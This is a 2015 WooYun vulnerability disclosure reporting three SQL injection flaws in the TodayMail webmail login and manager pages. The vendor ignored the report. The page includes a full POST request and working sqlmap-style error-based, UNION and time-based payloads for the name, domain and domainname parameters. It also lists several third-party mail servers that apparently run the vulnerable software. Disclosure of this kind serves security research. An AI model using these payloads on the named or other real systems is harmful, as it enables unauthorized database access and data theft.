当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0110383

漏洞标题:TodayMail SQL注入漏洞三处官网复现

相关厂商:广东时代互联科技有限公司

漏洞作者: 路人甲

提交时间:2015-04-27 12:44

修复时间:2015-07-31 12:47

公开时间:2015-07-31 12:47

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:10

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-04-27: 细节已通知厂商并且等待厂商处理中
2015-05-02: 厂商主动忽略漏洞,细节向第三方安全合作伙伴开放
2015-06-26: 细节向核心白帽子及相关领域专家公开
2015-07-06: 细节向普通白帽子公开
2015-07-16: 细节向实习白帽子公开
2015-07-31: 细节向公众公开

简要描述:

TodayMail SQL注入漏洞三处

详细说明:

漏洞细节:
官网案例:http://www.now.cn/email/
关键字:
Power by Todaynic.com,Inc. 构造的不是很好。。。

1.png


官网测试成功!
demo:http://mail.now.cn/
手机版登陆:基于登陆处的SQL注入漏洞

1.png


POST /manager/forwardMobile.php HTTP/1.1
Host: mail.now.cn
Proxy-Connection: keep-alive
Content-Length: 39
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://mail.now.cn
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.99 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://mail.now.cn/tindex.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: LXB_REFER=www.haosou.com; pgv_pvi=6507704320; pgv_si=s9312702464; Hm_lvt_ddaf8c4c0fd64175d7c169fbef9c7b43=1429755365; Hm_lpvt_ddaf8c4c0fd64175d7c169fbef9c7b43=1429755424; PHPSESSID=8a1fqb2dc2afk7ukii6nq1o864; UserLang=0
name=11111&domain=now.cn&passwd=1111111


注入一:
注入参数:name

---
Place: POST
Parameter: name
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: name=11111' AND (SELECT 7582 FROM(SELECT COUNT(*),CONCAT(0x3a706270
3a,(SELECT (CASE WHEN (7582=7582) THEN 1 ELSE 0 END)),0x3a6173633a,FLOOR(RAND(0)
*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'DhHX'='DhHX&doma
in=now.cn&passwd=1111111
    Type: AND/OR time-based blind
    Title: MySQL < 5.0.12 AND time-based blind (heavy query)
    Payload: name=11111' AND 9699=BENCHMARK(5000000,MD5(0x46515171)) AND 'WJRw'=
'WJRw&domain=now.cn&passwd=1111111
---


1.png


数据库:

2.png


用户:

3.png


注入二:
注入参数:domain

Place: POST
Parameter: domain
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: name=11111&domain=now.cn' AND (SELECT 7765 FROM(SELECT COUNT(*),CON
CAT(0x3a7062703a,(SELECT (CASE WHEN (7765=7765) THEN 1 ELSE 0 END)),0x3a6173633a
,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'uL
dz'='uLdz&passwd=1111111
    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 column
    Payload: name=11111&domain=-5534' UNION ALL SELECT CONCAT(0x3a7062703a,0x416
b4e616b42466c6a79,0x3a6173633a)#&passwd=1111111
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: name=11111&domain=now.cn' AND SLEEP(5) AND 'qTQz'='qTQz&passwd=1111
111
---


1.png


2.png


注入三:
注入参数:domainname

Place: POST
Parameter: domainname
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: chrpassword=11&oldpass=11&authflag=1&disablewebmail=11&lang=1&Submi
t=Manager Login&lang=0&domainname=11' AND (SELECT 3694 FROM(SELECT COUNT(*),CONC
AT(0x3a6567643a,(SELECT (CASE WHEN (3694=3694) THEN 1 ELSE 0 END)),0x3a6d706d3a,
FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'YUa
m'='YUam
---


1.png


再枚举部分案例:
http://cdn605.todayisp.net/mobile/index.php
http://mail.ehbh.cn/mobile/
http://mail.chdakm.com/mobile/index.php
http://mail.sf-power.com.cn/webmail/login.php
http://pop.joinway.com/touch/
http://smtp.power-ring.cn/webmail/login.php
http://mail.vision-power.com.cn/webmail/login.php
http://mail.maxpowercn.com/webmail/login.php
等等

漏洞证明:

如上!

修复方案:

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-07-31 12:47

厂商回复:

漏洞Rank:15 (WooYun评价)

最新状态:

暂无